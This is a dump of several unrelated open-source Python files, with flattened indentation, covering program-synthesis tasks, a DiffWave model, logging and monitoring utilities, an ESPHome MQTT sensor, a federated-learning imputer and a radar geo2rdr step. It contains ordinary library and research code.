nn, n = randomPolynomial(no)
nf = random.choice([1, 2])
dn, d = randomFactored(nf)
def f(x): return n(x) / d(x)
if no == 0:
name = "%s/[%s]" % (nn, dn)
else:
name = "(%s)/[%s]" % (nn, dn)
return name, f, no + 1 + nf
def randomPower():
e = random.choice([1, 2, 3])
c = randomCoefficient()
def f(x):
return c * (x**(-e))
if e == 1:
name = "%0.1f/x" % c
else:
name = "%0.1f/x^%d" % (c, e)
return name, f
def prettyFunction(f, export):
import numpy as np
n = 200
dx = 10.
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plot
figure = plot.figure()
plot.plot(np.arange(-dx, dx, 0.05),
[0.5*f(x/2) for x in np.arange(-dx, dx, 0.05)],
linewidth=15,
color='c')
plot.ylim([-dx,dx])
plot.gca().set_xticklabels([])
plot.gca().set_yticklabels([])
for tic in plot.gca().xaxis.get_major_ticks():
tic.tick1On = tic.tick2On = False
# plot.xlabel([])
#plot.yticks([])
#plot.axis('off')
plot.grid(color='k',linewidth=2)
plot.savefig(export)
print(export)
plot.close(figure)
def drawFunction(n, dx, f, resolution=64):
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plot
from PIL import Image
figure = plot.figure()
plot.plot(np.arange(-dx, dx, 0.05),
[f(x) for x in np.arange(-dx, dx, 0.05)],
linewidth=20)
plot.ylim([-10, 10])
plot.axis('off')
figure.canvas.draw()
data = np.frombuffer(figure.canvas.tostring_rgb(), dtype=np.uint8)
data = data.reshape(figure.canvas.get_width_height()[::-1] + (3,))
data = data[:, :, 0]
data = 255 - data
data = data / 255.
# print "upper and lower bounds before
# resizing",np.max(data),np.min(data),data.dtype
data = np.array(Image.fromarray(data).resize(size=(resolution, resolution), resample=Image.BICUBIC).getdata()).reshape((resolution, resolution))
# print "upper and lower bounds after
# resizing",np.max(data),np.min(data),data.dtype
plot.close(figure)
return data
def makeTasks():
tasks = []
tasksPerType = 35
ts = []
while len(ts) < tasksPerType:
n, f = randomOffset()
if makeTask(n, f, 1) is None:
continue
ts.append(makeTask(n, f, 1))
tasks += ts
for o in range(1, 5):
ts = []
while len(ts) < tasksPerType:
n, f = randomPolynomial(o)
if makeTask(n, f, o + 1) is None:
continue
ts.append(makeTask(n, f, o + 1))
tasks += ts
ts = []
while len(ts) < tasksPerType * 3:
n, f, df = randomRational()
if makeTask(n, f, df) is None:
continue
ts.append(makeTask(n, f, df))
tasks += ts
ts = []
while len(ts) < tasksPerType:
n, f = randomPower()
if makeTask(n, f, 1) is None:
continue
ts.append(makeTask(n, f, 1))
tasks += ts
return tasks
class RandomParameterization(object):
def primitive(self, e):
if e.name == 'REAL':
return Primitive(str(e), e.tp, randomCoefficient())
return e
def invented(self, e): return e.body.visit(self)
def abstraction(self, e): return Abstraction(e.body.visit(self))
def application(self, e):
return Application(e.f.visit(self), e.x.visit(self))
def index(self, e): return e
RandomParameterization.single = RandomParameterization()
class FeatureExtractor(ImageFeatureExtractor):
special = 'differentiable'
def __init__(self, tasks, testingTasks=[], cuda=False, H=64):
self.recomputeTasks = True
super(FeatureExtractor, self).__init__(inputImageDimension=64,
channels=1)
self.tasks = tasks
def featuresOfTask(self, t):
return self(t.features)
def taskOfProgram(self, p, t):
p = p.visit(RandomParameterization.single)
def f(x): return p.runWithArguments([x])
t = makeTask(str(p), f, None)
if t is None:
return None
t.features = drawFunction(200, 5., t.f)
delattr(t, 'f')
return t
def demo():
from PIL import Image
os.system("mkdir -p /tmp/rational_demo")
for j, t in enumerate(makeTasks()): # range(100):
name, f = t.name, t.f
prettyFunction(f, f"/tmp/rational_demo/{name.replace('/','$')}.png")
print(j, "\n", name)
a = drawFunction(200, 5., f, resolution=32) * 255
Image.fromarray(a).convert('RGB').save("/tmp/rational_demo/%d.png" % j)
assert False
#demo()
def rational_options(p):
p.add_argument("--smooth", action="store_true",
default=False,
help="smooth likelihood model")
if __name__ == "__main__":
import time
arguments = commandlineArguments(
featureExtractor=FeatureExtractor,
iterations=6,
CPUs=numberOfCPUs(),
structurePenalty=1.,
recognitionTimeout=7200,
helmholtzRatio=0.5,
activation="tanh",
maximumFrontier=5,
a=3,
topK=2,
pseudoCounts=30.0,
extras=rational_options)
primitives = [real,
# f1,
real_division, real_addition, real_multiplication]
baseGrammar = Grammar.uniform(primitives)
random.seed(42)
tasks = makeTasks()
smooth = arguments.pop('smooth')
for t in tasks:
t.features = drawFunction(200, 10., t.f)
delattr(t, 'f')
if smooth:
t.likelihoodThreshold = None
eprint("Got %d tasks..." % len(tasks))
test, train = testTrainSplit(tasks, 100)
random.shuffle(test)
test = test[:100]
eprint("Training on", len(train), "tasks")
if False:
hardTasks = [t for t in train
if '/' in t.name and '[' in t.name]
for clamp in [True, False]:
for lr in [0.1, 0.05, 0.5, 1.]:
for steps in [50, 100, 200]:
for attempts in [10, 50, 100, 200]:
for s in [0.1, 0.5, 1, 3]:
start = time.time()
losses = callCompiled(
debugMany, hardTasks, clamp, lr, steps, attempts, s)
losses = dict(zip(hardTasks, losses))
failures = 0
for t, l in sorted(
losses.items(), key=lambda t_l: t_l[1]):
# print t,l
if l > -t.likelihoodThreshold:
failures += 1
eprint("clamp,lr,steps, attempts,std",
clamp, lr, steps, attempts, s)
eprint(
"%d/%d failures" %
(failures, len(hardTasks)))
eprint("dt=", time.time() - start)
eprint()
eprint()
assert False
timestamp = datetime.datetime.now().isoformat()
outputDirectory = "experimentOutputs/rational/%s"%timestamp
os.system("mkdir -p %s"%outputDirectory)
explorationCompression(baseGrammar, train,
outputPrefix="%s/rational"%outputDirectory,
evaluationTimeout=0.1,
testingTasks=test,
**arguments)
|
autoregressive_diffusion/experiments/audio/arch/diff_wave.py
|
xxdreck/google-research
| 23,901 |
78267
|
<filename>autoregressive_diffusion/experiments/audio/arch/diff_wave.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""DiffWave architecture.
Ported from PyTorch to JAX from
https://github.com/philsyn/DiffWave-unconditional/blob/master/WaveNet.py
"""
from typing import Any, Callable, Iterable, Optional, Tuple
from flax import linen as nn
import jax
from jax import numpy as jnp
import numpy as np
from autoregressive_diffusion.model.architecture_components import input_embedding
from autoregressive_diffusion.model.architecture_components import layers
Array = jnp.ndarray
Shape = Iterable[int]
Dtype = Any
PRNGKey = Array
InitializerFn = Callable[[PRNGKey, Shape, Dtype], Array]
class ResBlock(nn.Module):
"""Step-conditioned Residual block."""
features: int
kernel_size: Tuple[int] = (3,)
kernel_dilation: Tuple[int] = (1,)
skip_features: Optional[int] = None
kernel_init: InitializerFn = nn.initializers.kaiming_normal()
activation: Callable[[Array], Array] = jax.nn.swish
is_causal: bool = False
@nn.compact
def __call__(self, x, t_embed):
"""Apply the residual block.
Args:
x: Inputs of shape [batch, <spatial>, features].
t_embed: Embedded time steps of shape [batch, dim].
Returns:
Mapped inputs of shape [batch, <spatial>, features] for the output and
skip connections.
"""
in_features = x.shape[-1]
if in_features != self.features:
raise ValueError(
f'DiffWave ResBlock requires the same number of input ({in_features})'
f'and output ({self.features}) features.')
h = x
if t_embed is not None:
# Project time step embedding.
t_embed = nn.Dense(
in_features,
name='step_proj')(
self.activation(t_embed))
# Reshape to [batch, 1, ..., 1, in_features] for broadcast.
t_embed = jnp.reshape(
t_embed,
(-1,) + (1,) * len(self.kernel_size) + (in_features,))
h += t_embed
# Dilated gated conv.
u = layers.CausalConv(
self.features,
self.kernel_size,
kernel_dilation=self.kernel_dilation,
kernel_init=self.kernel_init,
padding='VALID' if self.is_causal else 'SAME',
is_causal=self.is_causal,
name='dilated_tanh')(
h)
v = layers.CausalConv(
self.features,
self.kernel_size,
kernel_dilation=self.kernel_dilation,
kernel_init=self.kernel_init,
padding='VALID' if self.is_causal else 'SAME',
is_causal=self.is_causal,
name='dilated_sigmoid')(
h)
y = jax.nn.tanh(u) * jax.nn.sigmoid(v)
# Residual and skip convs.
residual = nn.Conv(
self.features,
(1,) * len(self.kernel_size),
kernel_init=self.kernel_init,
name='residual')(
y)
skip = nn.Conv(
self.skip_features or self.features,
(1,) * len(self.kernel_size),
kernel_init=self.kernel_init,
name='skip')(
y)
return (x + residual) / np.sqrt(2.), skip
class ResGroup(nn.Module):
"""Residual group with skip connection aggregation and dilation cycling.
Attributes:
num_blocks: Number of residual blocks.
features: Number of ResBlock features.
skip_features: Number of ResBlock skip connection features.
kernel_size: Kernel size for ResBlock-s.
kernel_init: Convolutional kernel initializer.
dilation_cycle: Dilation cycling length.
is_causal: Whether to use a causal architecture.
"""
num_blocks: int
features: int
skip_features: Optional[int] = None
kernel_size: Tuple[int] = (3,)
kernel_init: InitializerFn = nn.initializers.kaiming_normal()
dilation_cycle: int = 12 # Max dilation is 2 ** 11 = 2048.
is_causal: bool = False
@nn.compact
def __call__(self, x, t_embed):
"""Apply a residual group.
Args:
x: Inputs of shape [batch, <spatial>, features].
t_embed: Embedded time steps of shape [batch, dim].
Returns:
Mapped inputs of shape [batch, <spatial>, skip_features]
"""
y = 0.
for i in range(self.num_blocks):
x, skip = ResBlock(
features=self.features,
skip_features=self.skip_features,
kernel_size=self.kernel_size,
kernel_dilation=(2 ** (i % self.dilation_cycle),),
kernel_init=self.kernel_init,
is_causal=self.is_causal)(
x, t_embed)
y += skip
y /= np.sqrt(self.num_blocks)
return y
class DiffWave(nn.Module):
"""DiffWave network architecture.
Attributes:
num_blocks: Number of residual blocks.
features: Number of ResBlock features.
max_time: Number of generation steps (i.e. data dimensionality).
num_classes: Number of output classes.
output_features: Number of output features.
skip_features: Number of ResBlock skip connection features.
kernel_size: Kernel size for ResBlock-s.
kernel_init: Convolutional kernel initializer.
dilation_cycle: ResGroup dilation cycling length.
is_causal: Whether to use the causal architecture.
"""
num_blocks: int
features: int
max_time: int
num_classes: int
output_features: Optional[int] = 1
skip_features: Optional[int] = None
kernel_size: Tuple[int] = (3,)
kernel_init: InitializerFn = nn.initializers.kaiming_normal()
dilation_cycle: int = 12
is_causal: bool = False
@nn.compact
def __call__(self, x, t, mask, train,
context = None):
"""Apply the WaveDiff network.
Args:
x: Inputs of shape [batch, <spatial>, features].
t: Time steps of shape [batch].
mask: Array of the same shape as `x` giving the auto-regressive mask.
train: If True, the model is ran in training. *Not* used in this
architecture.
context: Unused.
Returns:
Mapped inputs of shape [batch, <spatial>, skip_features]
"""
assert context is None
# Sinusoidal features + MLP for time step embedding.
# Note: this differs from the DiffWave embedding in several ways:
# * Time embeddings have different dimensionality: 128-512-512
# vs 256-1024-1024.
# * First convlution has kernel size 3 instead of 1.
h, t_embed = input_embedding.InputProcessingAudio(
num_classes=self.num_classes,
num_channels=self.features,
max_time=self.max_time,
is_causal=self.is_causal)(
x, t, mask, train)
del x, t, mask
h = nn.relu(h)
h = ResGroup(
num_blocks=self.num_blocks,
features=self.features,
skip_features=self.skip_features,
kernel_size=self.kernel_size,
dilation_cycle=self.dilation_cycle,
kernel_init=self.kernel_init,
is_causal=self.is_causal,
name='res_group')(
h, t_embed)
# Final convolution.
h = nn.Conv(
features=self.skip_features or self.features,
kernel_size=(1,) * len(self.kernel_size),
kernel_init=self.kernel_init,
name='flower_conv')(
h)
h = nn.relu(h)
if self.output_features:
h = nn.Conv(
features=self.output_features,
kernel_size=(1,) * len(self.kernel_size),
kernel_init=nn.initializers.zeros,
name='class_conv')(
h)
return h
|
lyrebird/checker/decoder.py
|
DuXiao1997/lyrebird
| 737 |
78309
|
from lyrebird import application
from .. import checker
class CustomDecoder:
def __call__(self, rules=None, *args, **kw):
def func(origin_func):
func_type = checker.TYPE_DECODER
if not checker.scripts_tmp_storage.get(func_type):
checker.scripts_tmp_storage[func_type] = []
checker.scripts_tmp_storage[func_type].append({
'name': origin_func.__name__,
'func': origin_func,
'rules': rules
})
return origin_func
return func
@staticmethod
def register(func_info):
application.decoder.append(func_info)
@staticmethod
def unregister(func_info):
if func_info in application.decoder:
application.decoder.remove(func_info)
decoder = CustomDecoder()
|
client/labml/internal/monitor/__init__.py
|
elgalu/labml
| 463 |
78325
|
<filename>client/labml/internal/monitor/__init__.py
import typing
from typing import Optional, List, Union, Tuple
from labml.internal.util.colors import StyleCode
from .iterator import Iterator
from .loop import Loop
from .mix import Mix
from .sections import Section, OuterSection
from ..logger import logger_singleton as logger
from ..logger.types import LogPart
from ..tracker import tracker_singleton as tracker
from ...logger import Text
from ...utils.notice import labml_notice
class Monitor:
__loop_indicators: List[Union[str, Tuple[str, Optional[StyleCode]]]]
__is_looping: bool
def __init__(self):
self.__loop: Optional[Loop] = None
self.__sections: List[Section] = []
self.__is_looping = False
self.__loop_indicators = []
self.__is_silent = False
def clear(self):
self.__loop: Optional[Loop] = None
self.__sections: List[Section] = []
self.__is_looping = False
self.__loop_indicators = []
def silent(self, is_silent: bool = True):
self.__is_silent = is_silent
def mix(self, total_iterations, iterators: List[Tuple[str, typing.Sized]],
is_monit: bool):
return Mix(total_iterations=total_iterations,
iterators=iterators,
is_monit=is_monit, logger=self)
def iterate(self, name, iterable: Union[typing.Iterable, typing.Sized, int],
total_steps: Optional[int], *,
is_silent: bool,
is_children_silent: bool,
is_timed: bool,
section: Optional[Section]):
return Iterator(logger=self,
name=name,
iterable=iterable,
is_silent=is_silent,
is_timed=is_timed,
total_steps=total_steps,
is_children_silent=is_children_silent,
is_enumerate=False,
section=section)
def enum(self, name, iterable: typing.Sized, *,
is_silent: bool,
is_children_silent: bool,
is_timed: bool,
section: Optional[Section]):
return Iterator(logger=self,
name=name,
iterable=iterable,
is_silent=is_silent,
is_timed=is_timed,
total_steps=None,
is_children_silent=is_children_silent,
is_enumerate=True,
section=section)
def section(self, name, *,
is_silent: bool,
is_timed: bool,
is_partial: bool,
is_new_line: bool,
is_children_silent: bool,
total_steps: float) -> Section:
if self.__is_looping:
if len(self.__sections) != 0:
is_silent = True
section = self.__loop.get_section(name=name,
is_silent=is_silent,
is_timed=is_timed,
is_partial=is_partial,
total_steps=total_steps,
parents=[s.name for s in self.__sections])
self.__sections.append(section)
else:
if len(self.__sections) > 0:
if self.__sections[-1].is_silent or self.__sections[-1].is_children_silent:
is_silent = True
is_children_silent = True
self.__sections.append(OuterSection(monitor=self,
name=name,
is_silent=is_silent,
is_timed=is_timed,
is_partial=is_partial,
is_new_line=is_new_line,
is_children_silent=is_children_silent,
total_steps=total_steps,
level=len(self.__sections)))
return self.__sections[-1]
def progress(self, steps: float):
if len(self.__sections) == 0:
raise RuntimeError("You must be within a section to report progress")
if self.__sections[-1].progress(steps):
self.__log_line()
def set_successful(self, is_successful=True):
if len(self.__sections) == 0:
raise RuntimeError("You must be within a section to report success")
self.__sections[-1].is_successful = is_successful
self.__log_line()
def loop(self, iterator_: typing.Collection, *,
is_track: bool,
is_print_iteration_time: bool):
if len(self.__sections) != 0:
labml_notice(['LabML Loop: ', ('Starting loop inside sections', Text.key), '\n',
(
'This could be because some iterators crashed in a previous cell in a notebook.',
Text.meta)],
is_danger=False)
err = RuntimeError('Section outside loop')
for s in reversed(self.__sections):
s.__exit__(type(err), err, err.__traceback__)
# raise RuntimeError("Cannot start a loop within a section")
self.__loop = Loop(iterator=iterator_,
monitor=self,
is_track=is_track,
is_print_iteration_time=is_print_iteration_time)
return self.__loop
def start_loop(self):
self.__is_looping = True
tracker().start_loop(self.set_looping_indicators)
def finish_loop(self):
if len(self.__sections) != 0:
raise RuntimeError("Cannot be within a section when finishing the loop")
tracker().finish_loop()
self.__loop = None
self.__is_looping = False
def section_enter(self, section):
if len(self.__sections) == 0:
raise RuntimeError("Entering a section without creating a section.\n"
"Always use logger.section to create a section")
if section is not self.__sections[-1]:
raise RuntimeError("Entering a section other than the one last_created\n"
"Always user with logger.section(...):")
if len(self.__sections) > 1 and not self.__sections[-2].is_parented:
self.__sections[-2].make_parent()
if not self.__is_silent and not self.__sections[-1].is_silent:
logger().log([])
self.__log_line()
def __log_looping_line(self):
parts = [(f"{tracker().global_step :8,}: ", Text.highlight)]
parts += self.__loop.log_sections()
parts += self.__loop_indicators
parts += self.__loop.log_progress()
if not self.__is_silent:
logger().log(parts, is_new_line=False)
def __log_line(self):
if self.__is_looping:
self.__log_looping_line()
return
if len(self.__sections) == 0:
return
parts = self.__sections[-1].log()
if parts is None:
return
if not self.__is_silent:
logger().log(parts, is_new_line=False)
def set_looping_indicators(self, indicators: List[LogPart]):
self.__loop_indicators = indicators
self.__log_looping_line()
def section_exit(self, section):
if len(self.__sections) == 0:
raise RuntimeError("Impossible")
if section is not self.__sections[-1]:
raise RuntimeError("Impossible")
self.__log_line()
self.__sections.pop(-1)
_internal: Optional[Monitor] = None
def monitor_singleton() -> Monitor:
global _internal
if _internal is None:
_internal = Monitor()
return _internal
|
esphome/components/mqtt_subscribe/sensor/__init__.py
|
OttoWinter/esphomeyaml
| 249 |
78353
|
<reponame>OttoWinter/esphomeyaml
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import mqtt, sensor
from esphome.const import (
CONF_QOS,
CONF_TOPIC,
)
from .. import mqtt_subscribe_ns
DEPENDENCIES = ["mqtt"]
CONF_MQTT_PARENT_ID = "mqtt_parent_id"
MQTTSubscribeSensor = mqtt_subscribe_ns.class_(
"MQTTSubscribeSensor", sensor.Sensor, cg.Component
)
CONFIG_SCHEMA = (
sensor.sensor_schema(
MQTTSubscribeSensor,
accuracy_decimals=1,
)
.extend(
{
cv.GenerateID(CONF_MQTT_PARENT_ID): cv.use_id(mqtt.MQTTClientComponent),
cv.Required(CONF_TOPIC): cv.subscribe_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
}
)
.extend(cv.COMPONENT_SCHEMA)
)
async def to_code(config):
var = await sensor.new_sensor(config)
await cg.register_component(var, config)
parent = await cg.get_variable(config[CONF_MQTT_PARENT_ID])
cg.add(var.set_parent(parent))
cg.add(var.set_topic(config[CONF_TOPIC]))
cg.add(var.set_qos(config[CONF_QOS]))
|
python/federatedml/feature/imputer.py
|
hubert-he/FATE
| 3,787 |
78373
|
<gh_stars>1000+
import copy
import functools
import numpy as np
from federatedml.statistic.data_overview import get_header
from federatedml.statistic.statics import MultivariateStatisticalSummary
from federatedml.util import consts
from federatedml.util import LOGGER
from federatedml.statistic import data_overview
class Imputer(object):
"""
This class provides basic strategies for values replacement. It can be used as missing filled or outlier replace.
You can use the statistics such as mean, median or max of each column to fill the missing value or replace outlier.
"""
def __init__(self, missing_value_list=None):
"""
Parameters
----------
missing_value_list: list of str, the value to be replaced. Default None, if is None, it will be set to list of blank, none, null and na,
which regarded as missing filled. If not, it can be outlier replace, and missing_value_list includes the outlier values
"""
if missing_value_list is None:
self.missing_value_list = ['', 'none', 'null', 'na']
else:
self.missing_value_list = missing_value_list
self.support_replace_method = ['min', 'max', 'mean', 'median', 'quantile', 'designated']
self.support_output_format = {
'str': str,
'float': float,
'int': int,
'origin': None
}
self.support_replace_area = {
'min': 'col',
'max': 'col',
'mean': 'col',
'median': 'col',
'quantile': 'col',
'designated': 'col'
}
self.cols_fit_impute_rate = []
self.cols_transform_impute_rate = []
def get_missing_value_list(self):
return self.missing_value_list
def get_impute_rate(self, mode="fit"):
if mode == "fit":
return list(self.cols_fit_impute_rate)
elif mode == "transform":
return list(self.cols_transform_impute_rate)
else:
raise ValueError("Unknown mode of {}".format(mode))
@staticmethod
def __replace_missing_value_with_cols_transform_value_format(data, transform_list, missing_value_list,
output_format):
_data = copy.deepcopy(data)
replace_cols_index_list = []
for i, v in enumerate(_data):
if str(v) in missing_value_list:
_data[i] = output_format(transform_list[i])
replace_cols_index_list.append(i)
else:
_data[i] = output_format(v)
return _data, replace_cols_index_list
@staticmethod
def __replace_missing_value_with_cols_transform_value(data, transform_list, missing_value_list):
_data = copy.deepcopy(data)
replace_cols_index_list = []
for i, v in enumerate(_data):
if str(v) in missing_value_list:
_data[i] = str(transform_list[i])
replace_cols_index_list.append(i)
return _data, replace_cols_index_list
@staticmethod
def __replace_missing_value_with_replace_value_format(data, replace_value, missing_value_list, output_format):
_data = copy.deepcopy(data)
replace_cols_index_list = []
for i, v in enumerate(_data):
if str(v) in missing_value_list:
_data[i] = output_format(replace_value)
replace_cols_index_list.append(i)
else:
_data[i] = output_format(_data[i])
return _data, replace_cols_index_list
@staticmethod
def __replace_missing_value_with_replace_value(data, replace_value, missing_value_list):
_data = copy.deepcopy(data)
replace_cols_index_list = []
for i, v in enumerate(_data):
if str(v) in missing_value_list:
_data[i] = str(replace_value)
replace_cols_index_list.append(i)
return _data, replace_cols_index_list
def __get_cols_transform_value(self, data, replace_method, quantile=None):
summary_obj = MultivariateStatisticalSummary(data, -1, abnormal_list=self.missing_value_list)
header = get_header(data)
if replace_method == consts.MIN:
cols_transform_value = summary_obj.get_min()
elif replace_method == consts.MAX:
cols_transform_value = summary_obj.get_max()
elif replace_method == consts.MEAN:
cols_transform_value = summary_obj.get_mean()
elif replace_method == consts.MEDIAN:
cols_transform_value = summary_obj.get_median()
elif replace_method == consts.QUANTILE:
if quantile > 1 or quantile < 0:
raise ValueError("quantile should between 0 and 1, but get:{}".format(quantile))
cols_transform_value = summary_obj.get_quantile_point(quantile)
else:
raise ValueError("Unknown replace method:{}".format(replace_method))
cols_transform_value = [round(cols_transform_value[key], 6) for key in header]
return cols_transform_value
def __fit_replace(self, data, replace_method, replace_value=None, output_format=None, quantile=None):
if replace_method is not None and replace_method != consts.DESIGNATED:
cols_transform_value = self.__get_cols_transform_value(data, replace_method, quantile=quantile)
if output_format is not None:
f = functools.partial(Imputer.__replace_missing_value_with_cols_transform_value_format,
transform_list=cols_transform_value, missing_value_list=self.missing_value_list,
output_format=output_format)
else:
f = functools.partial(Imputer.__replace_missing_value_with_cols_transform_value,
transform_list=cols_transform_value, missing_value_list=self.missing_value_list)
transform_data = data.mapValues(f)
LOGGER.info(
"finish replace missing value with cols transform value, replace method is {}".format(replace_method))
return transform_data, cols_transform_value
else:
if replace_value is None:
raise ValueError("Replace value should not be None")
if output_format is not None:
f = functools.partial(Imputer.__replace_missing_value_with_replace_value_format,
replace_value=replace_value, missing_value_list=self.missing_value_list,
output_format=output_format)
else:
f = functools.partial(Imputer.__replace_missing_value_with_replace_value, replace_value=replace_value,
missing_value_list=self.missing_value_list)
transform_data = data.mapValues(f)
LOGGER.info("finish replace missing value with replace value {}, replace method is:{}".format(replace_value,
replace_method))
shape = data_overview.get_data_shape(data)
replace_value = [replace_value for _ in range(shape)]
return transform_data, replace_value
def __transform_replace(self, data, transform_value, replace_area, output_format):
if replace_area == 'all':
if output_format is not None:
f = functools.partial(Imputer.__replace_missing_value_with_replace_value_format,
replace_value=transform_value, missing_value_list=self.missing_value_list,
output_format=output_format)
else:
f = functools.partial(Imputer.__replace_missing_value_with_replace_value,
replace_value=transform_value, missing_value_list=self.missing_value_list)
elif replace_area == 'col':
if output_format is not None:
f = functools.partial(Imputer.__replace_missing_value_with_cols_transform_value_format,
transform_list=transform_value, missing_value_list=self.missing_value_list,
output_format=output_format)
else:
f = functools.partial(Imputer.__replace_missing_value_with_cols_transform_value,
transform_list=transform_value, missing_value_list=self.missing_value_list)
else:
raise ValueError("Unknown replace area {} in Imputer".format(replace_area))
return data.mapValues(f)
@staticmethod
def __get_impute_number(some_data):
impute_num_list = None
data_size = None
for line in some_data:
processed_data = line[1][0]
index_list = line[1][1]
if not data_size:
data_size = len(processed_data)
# data_size + 1, the last element of impute_num_list used to count the number of "some_data"
impute_num_list = [0 for _ in range(data_size + 1)]
impute_num_list[data_size] += 1
for index in index_list:
impute_num_list[index] += 1
return np.array(impute_num_list)
def __get_impute_rate_from_replace_data(self, data):
impute_number_statics = data.applyPartitions(self.__get_impute_number).reduce(lambda x, y: x + y)
cols_impute_rate = impute_number_statics[:-1] / impute_number_statics[-1]
return cols_impute_rate
def fit(self, data, replace_method=None, replace_value=None, output_format=consts.ORIGIN, quantile=None):
"""
Apply imputer for input data
Parameters
----------
data: DTable, each data's value should be list
replace_method: str, the strategy of imputer, like min, max, mean or designated and so on. Default None
replace_value: str, if replace_method is designated, you should assign the replace_value which will be used to replace the value in imputer_value_list
output_format: str, the output data format. The output data can be 'str', 'int', 'float'. Default origin, the original format as input data
Returns
----------
fit_data:data_instance, data after imputer
cols_transform_value: list, the replace value in each column
"""
if output_format not in self.support_output_format:
raise ValueError("Unsupport output_format:{}".format(output_format))
output_format = self.support_output_format[output_format]
if isinstance(replace_method, str):
replace_method = replace_method.lower()
if replace_method not in self.support_replace_method:
raise ValueError("Unknown replace method:{}".format(replace_method))
elif replace_method is None:
replace_value = '0'
else:
raise ValueError("parameter replace_method should be str or None only")
process_data, cols_transform_value = self.__fit_replace(data, replace_method, replace_value, output_format,
quantile=quantile)
self.cols_fit_impute_rate = self.__get_impute_rate_from_replace_data(process_data)
process_data = process_data.mapValues(lambda v:v[0])
process_data.schema = data.schema
return process_data, cols_transform_value
def transform(self, data, transform_value, output_format=consts.ORIGIN):
"""
Transform input data using Imputer with fit results
Parameters
----------
data: DTable, each data's value should be list
transform_value:
output_format: str, the output data format. The output data can be 'str', 'int', 'float'. Default origin, the original format as input data
Returns
----------
transform_data:data_instance, data after transform
"""
if output_format not in self.support_output_format:
raise ValueError("Unsupport output_format:{}".format(output_format))
output_format = self.support_output_format[output_format]
# Now all of replace_method is "col", remain replace_area temporarily
# replace_area = self.support_replace_area[replace_method]
replace_area = "col"
process_data = self.__transform_replace(data, transform_value, replace_area, output_format)
self.cols_transform_impute_rate = self.__get_impute_rate_from_replace_data(process_data)
process_data = process_data.mapValues(lambda v: v[0])
process_data.schema = data.schema
return process_data
|
components/isceobj/StripmapProc/runGeo2rdr.py
|
vincentschut/isce2
| 1,133 |
78448
|
<reponame>vincentschut/isce2<gh_stars>1000+
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2012 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import isceobj
import stdproc
from iscesys.ImageUtil.ImageUtil import ImageUtil as IU
from isceobj.Util.Polynomial import Polynomial
from isceobj.Util.Poly2D import Poly2D
from isceobj.Constants import SPEED_OF_LIGHT
import logging
import numpy as np
import datetime
import os
logger = logging.getLogger('isce.insar.runGeo2rdr')
def runGeo2rdr(self):
from zerodop.geo2rdr import createGeo2rdr
from isceobj.Planet.Planet import Planet
logger.info("Running geo2rdr")
info = self._insar.loadProduct( self._insar.secondarySlcCropProduct)
offsetsDir = self.insar.offsetsDirname
os.makedirs(offsetsDir, exist_ok=True)
grdr = createGeo2rdr()
grdr.configure()
planet = info.getInstrument().getPlatform().getPlanet()
grdr.slantRangePixelSpacing = info.getInstrument().getRangePixelSize()
grdr.prf = info.PRF #info.getInstrument().getPulseRepetitionFrequency()
grdr.radarWavelength = info.getInstrument().getRadarWavelength()
grdr.orbit = info.getOrbit()
grdr.width = info.getImage().getWidth()
grdr.length = info.getImage().getLength()
grdr.wireInputPort(name='planet', object=planet)
grdr.lookSide = info.instrument.platform.pointingDirection
grdr.setSensingStart(info.getSensingStart())
grdr.rangeFirstSample = info.startingRange
grdr.numberRangeLooks = 1
grdr.numberAzimuthLooks = 1
if self.insar.secondaryGeometrySystem.lower().startswith('native'):
p = [x/info.PRF for x in info._dopplerVsPixel]
else:
p = [0.]
grdr.dopplerCentroidCoeffs = p
grdr.fmrateCoeffs = [0.]
###Input and output files
grdr.rangeOffsetImageName = os.path.join(offsetsDir, self.insar.rangeOffsetFilename)
grdr.azimuthOffsetImageName = os.path.join(offsetsDir, self.insar.azimuthOffsetFilename)
latFilename = os.path.join(self.insar.geometryDirname, self.insar.latFilename + '.full')
lonFilename = os.path.join(self.insar.geometryDirname, self.insar.lonFilename + '.full')
heightFilename = os.path.join(self.insar.geometryDirname, self.insar.heightFilename + '.full')
demImg = isceobj.createImage()
demImg.load(heightFilename + '.xml')
demImg.setAccessMode('READ')
grdr.demImage = demImg
latImg = isceobj.createImage()
latImg.load(latFilename + '.xml')
latImg.setAccessMode('READ')
grdr.latImage = latImg
lonImg = isceobj.createImage()
lonImg.load(lonFilename + '.xml')
lonImg.setAccessMode('READ')
grdr.lonImage = lonImg
grdr.outputPrecision = 'DOUBLE'
grdr.geo2rdr()
return
|
awx/main/migrations/0129_unifiedjob_installed_collections.py
|
bhyunki/awx
| 11,396 |
78452
|
<reponame>bhyunki/awx<filename>awx/main/migrations/0129_unifiedjob_installed_collections.py
# Generated by Django 2.2.16 on 2021-02-16 20:27
